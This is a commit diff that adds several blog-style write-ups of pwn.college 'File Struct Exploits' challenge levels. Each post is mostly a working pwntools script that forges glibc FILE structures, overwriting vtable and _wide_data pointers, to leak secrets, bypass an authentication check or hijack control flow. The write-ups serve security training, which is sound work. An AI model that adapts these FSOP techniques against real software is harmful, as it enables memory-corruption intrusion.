F8-DAMM

hackeringtrue · hackeringtrue · commit 270c3d985700 · 2025-11-13T17:03:56.000+03:00
diff --git a/_posts/2025-11-10-pwn-college-File-Struct-Exploits-level9.md b/_posts/2025-11-10-pwn-college-File-Struct-Exploits-level9.md
@@ -0,0 +1,45 @@
+---
+layout: post
+title: (File Struct Exploits) level 9
+categories: pwn.college File-Struct-Exploits
+date: 2025-11-10 07:02:27 +0300
+tags: pwn.college FSOP vtable overlaping-vtable
+---
+## Information
+- category: pwn
+
+
+## Description 
+> Create a fake _wide_data struct to hijack control of the virtual function table of a built-in FILE struct.
+## Write-up
+ Same prev...) ._.
+```python
+from pwn import *
+
+elf = context.binary = ELF("/challenge/babyfile_level9")
+global p
+p = elf.process()
+
+def exploit():
+    p.recvuntil(b"libc is: ")
+    puts = int(p.recvline()[:-1],16) - 0x84420
+
+    _IO_wfile_overflow = puts + 0x1E8DC0
+    fp_addrr = puts + 0x1ed6a0
+
+    fp = FileStructure()
+    fp._lock = fp_addrr
+    fp.chain = elf.sym['authenticate'] + 37
+    fp._wide_data = fp_addrr
+    fp.vtable = _IO_wfile_overflow
+
+    p.send(bytes(fp) + p64(fp_addrr))
+
+    p.interactive()
+
+def main():
+    exploit()
+
+if __name__ == "__main__":
+    main()
+```
diff --git a/_posts/2025-11-12-pwn-college-File-Struct-Exploits-level11.md b/_posts/2025-11-12-pwn-college-File-Struct-Exploits-level11.md
@@ -0,0 +1,80 @@
+---
+layout: post
+title: (File Struct Exploits) level 11
+categories: pwn.college File-Struct-Exploits
+date: 2025-11-12 07:02:27 +0300
+tags: pwn.college FSOP fp-overwrite
+---
+## Information
+- category: pwn
+
+
+## Description 
+> Apply FILE struct exploits to leak a secret value.
+
+## Explit
+```python
+from pwn import *
+
+elf = context.binary = ELF("/challenge/babyfile_level11")
+global p
+p = elf.process()
+
+def new_note(size):
+    p.sendlineafter(b"> ",b"new_note")
+    p.send(size)
+
+def del_note():
+    p.sendlineafter(b"> ",b"del_note")
+
+def write_note(data):
+    p.sendlineafter(b"> ",b"write_note")
+    p.send(data)
+
+def read_note():
+    p.sendlineafter(b"> ",b"read_note")
+
+def open_file():
+    p.sendlineafter(b"> ",b"open_file")
+
+def close_file():
+    p.sendlineafter(b"> ",b"close_file")
+
+def write_file():
+    p.sendlineafter(b"> ",b"write_file")
+
+def write_fp(data):
+    p.sendlineafter(b"> ",b"write_fp")
+    p.send(data)
+
+def quit():
+    p.sendlineafter(b"quit")
+
+def exploit():
+    p.recvuntil(b"located at ")
+    flag = int(p.recvline()[:-1],16)
+
+    new_note(b"50")
+    write_note(b"AAAA")
+    read_note()
+
+    open_file()
+    
+    fp = FileStructure() 
+    fp.flags = 0x800
+    fp._IO_read_end = flag
+    fp._IO_write_base = flag
+    fp._IO_write_ptr = flag + 0x64
+    fp.fileno = 1
+
+    write_fp(bytes(fp.struntil("_flags2"))) # or just fp.write(flag,100)
+    write_file()
+
+    p.interactive()
+
+def main():
+    exploit()
+
+if __name__ == "__main__":
+    main()
+```
diff --git a/_posts/2025-11-7-pwn-college-File-Struct-Exploits-level2.md b/_posts/2025-11-7-pwn-college-File-Struct-Exploits-level2.md
@@ -0,0 +1,51 @@
+---
+layout: post
+title: (File Struct Exploits) level 2
+categories: pwn.college File-Struct-Exploits
+date: 2025-11-07 09:00:27 +0300
+tags: pwn.college FSOP 
+---
+## Information
+- category: pwn
+
+
+## Description 
+> Harness the power of FILE structs to arbitrarily write data to bypass a security check.
+
+## Write-up
+same previous but now in write.
+
+## Exploit
+```python
+from pwn import *
+
+elf = context.binary = ELF("/challenge/babyfile_level2")
+global p
+p = elf.process()
+"""
+ 0x0000000000401a38 <+165>:   mov    rdx,QWORD PTR [rip+0x27a9]        # 0x4041e8 <fp>
+   0x0000000000401a3f <+172>:   mov    rax,QWORD PTR [rip+0x27aa]        # 0x4041f0 <buf>
+   0x0000000000401a46 <+179>:   mov    rcx,rdx
+   0x0000000000401a49 <+182>:   mov    edx,0x100
+   0x0000000000401a4e <+187>:   mov    esi,0x1
+   0x0000000000401a53 <+192>:   mov    rdi,rax
+   0x0000000000401a56 <+195>:   call   0x401150 <fread@plt>
+   0x0000000000401a5b <+200>:   mov    eax,DWORD PTR [rip+0x2797]        # 0x4041f8 <authenticated>
+   0x0000000000401a61 <+206>:   test   eax,eax
+   0x0000000000401a63 <+208>:   je     0x401a71 <challenge+222>
+   0x0000000000401a65 <+210>:   mov    eax,0x0
+   0x0000000000401a6a <+215>:   call   0x4012f6 <win>
+   """
+def exploit():
+        fp = FileStructure()
+        payload = fp.read(0x4041f8,260)
+        p.send(payload)
+        p.send(b"A"*260)
+        p.interactive()
+
+def main():
+        exploit()
+
+if __name__ == "__main__":
+        main()
+```
diff --git a/_posts/2025-11-7-pwn-college-File-Struct-Exploits-level4.md b/_posts/2025-11-7-pwn-college-File-Struct-Exploits-level4.md
@@ -0,0 +1,38 @@
+---
+layout: post
+title: (File Struct Exploits) level 4
+categories: pwn.college File-Struct-Exploits
+date: 2025-11-07 07:00:27 +0300
+tags: pwn.college FSOP 
+---
+## Information
+- category: pwn
+
+
+## Description 
+> Harness the power of FILE structs to arbitrarily read/write data to hijack control flow.
+
+## Exploit
+```python
+from pwn import *
+
+elf = context.binary = ELF("/challenge/babyfile_level4")
+global p
+p = elf.process()
+
+def exploit():
+    p.recvuntil(b"stored at: ")
+    ret_address = int(p.recvline()[:-1],16)
+
+    fp = FileStructure()
+    payload = fp.read(ret_address,266)
+    p.send(payload)
+    p.send(p64(elf.sym['win']) + b"\x00"*258)
+    p.interactive()
+    
+def main():
+    exploit()
+
+if __name__ == "__main__":
+    main()
+```
diff --git a/_posts/2025-11-7-pwn-college-File-Struct-Exploits-level5.md b/_posts/2025-11-7-pwn-college-File-Struct-Exploits-level5.md
@@ -0,0 +1,41 @@
+---
+layout: post
+title: (File Struct Exploits) level 5
+categories: pwn.college File-Struct-Exploits
+date: 2025-11-07 07:02:27 +0300
+tags: pwn.college FSOP 
+---
+## Information
+- category: pwn
+
+
+## Description 
+> Abuse built-in FILE structs to leak sensitive information.
+
+## Exploit
+```python
+from pwn import *
+
+elf = context.binary = ELF("/challenge/babyfile_level5")
+global p
+p = elf.process()
+
+def exploit():
+    p.recvuntil(b"located at ")
+    secret_addr = int(p.recvline()[:-1],16)
+
+    fp = FileStructure()
+    fp.flags = 0xFBAD1800 # cruntly_puting and is_appending
+    fp._IO_write_base = secret_addr
+    fp._IO_write_end = secret_addr + 0x64
+    fp._IO_write_ptr = secret_addr + 0x64
+    payload = fp.struntil("_IO_write_end")
+    p.send(payload)
+    p.interactive()
+
+def main():
+    exploit()
+
+if __name__ == "__main__":
+    main()
+```
diff --git a/_posts/2025-11-7-pwn-college-File-Struct-Exploits-level6.md b/_posts/2025-11-7-pwn-college-File-Struct-Exploits-level6.md
@@ -0,0 +1,37 @@
+---
+layout: post
+title: (File Struct Exploits) level 6
+categories: pwn.college File-Struct-Exploits
+date: 2025-11-07 07:06:27 +0300
+tags: pwn.college FSOP 
+---
+## Information
+- category: pwn
+
+
+## Description 
+> Abuse built-in FILE structs to bypass a security check.
+
+## Exploit
+```python
+from pwn import *
+
+elf = context.binary = ELF("/challenge/babyfile_level6")
+global p
+p = elf.process()
+
+def exploit():
+    fp = FileStructure()
+    fp.flags = 0xFBAD2008
+    fp._IO_buf_base = 0x4041f8
+    fp._IO_buf_end =0x4041f8 + 5
+    payload = fp.struntil("_IO_buf_end") 
+    p.send(payload)
+    p.interactive()
+
+def main():
+    exploit()
+
+if __name__ == "__main__":
+    exploit()
+```
diff --git a/_posts/2025-11-9-pwn-college-File-Struct-Exploits-level8.md b/_posts/2025-11-9-pwn-college-File-Struct-Exploits-level8.md
@@ -0,0 +1,60 @@
+---
+layout: post
+title: (File Struct Exploits) level 8
+categories: pwn.college File-Struct-Exploits
+date: 2025-11-09 07:02:27 +0300
+tags: pwn.college FSOP vtable overlaping-vtable
+---
+## Information
+- category: pwn
+
+
+## Description 
+> Create a fake _wide_data struct to hijack control of the virtual function table of a FILE struct.
+## Write-up
+Since when program jump into ```__GI__IO_dallocbuff``` is get address of ```[wide_data + 0xe0]``` which will get what this address points for and grep this value then make again for this value ```[value + 0x68]``` and see what this address points for then get it and make  ```call forThisAddress``` so is too easy just after ```fp``` add address of ```buff``` then in ```fp.chain``` make it points to address of ```win``` and it's will do the following steps:
+1- [rdi+0xe0] --> rdi is wide_data if we make fp.wide_data = buff
+2- [buff+0xe0] --> which is address of buff
+3- [buff + 0x68] --> which is addres of win on chain var
+4- call win
+5- good luck in pwner hmmm.(:_:)
+
+
+## Explit
+```python
+from pwn import *
+
+elf = context.binary = ELF("/challenge/babyfile_level8")
+global p
+p = elf.process()
+
+
+def exploit():
+    p.recvuntil(b"libc is: ")
+    puts = int(p.recvline()[:-1],16)
+
+    p.recvuntil(b"writing to: ")
+    buff = int(p.recvline()[:-1],16)
+
+    libc = puts - 0x84420
+    _IO_wfile_overflow = libc + 0x1E8DC0
+    wide_data = buff
+    
+    fp = FileStructure()
+    fp._lock = buff
+    fp.chain = elf.sym['win']
+    fp._wide_data = wide_data
+    fp.vtable = _IO_wfile_overflow
+    fp = bytes(fp) + p64(buff)
+
+    raw_input("DEBUG")
+    p.send(fp)
+
+    p.interactive()
+
+def main():
+    exploit()
+
+if __name__ == "__main__":
+    main()
+```
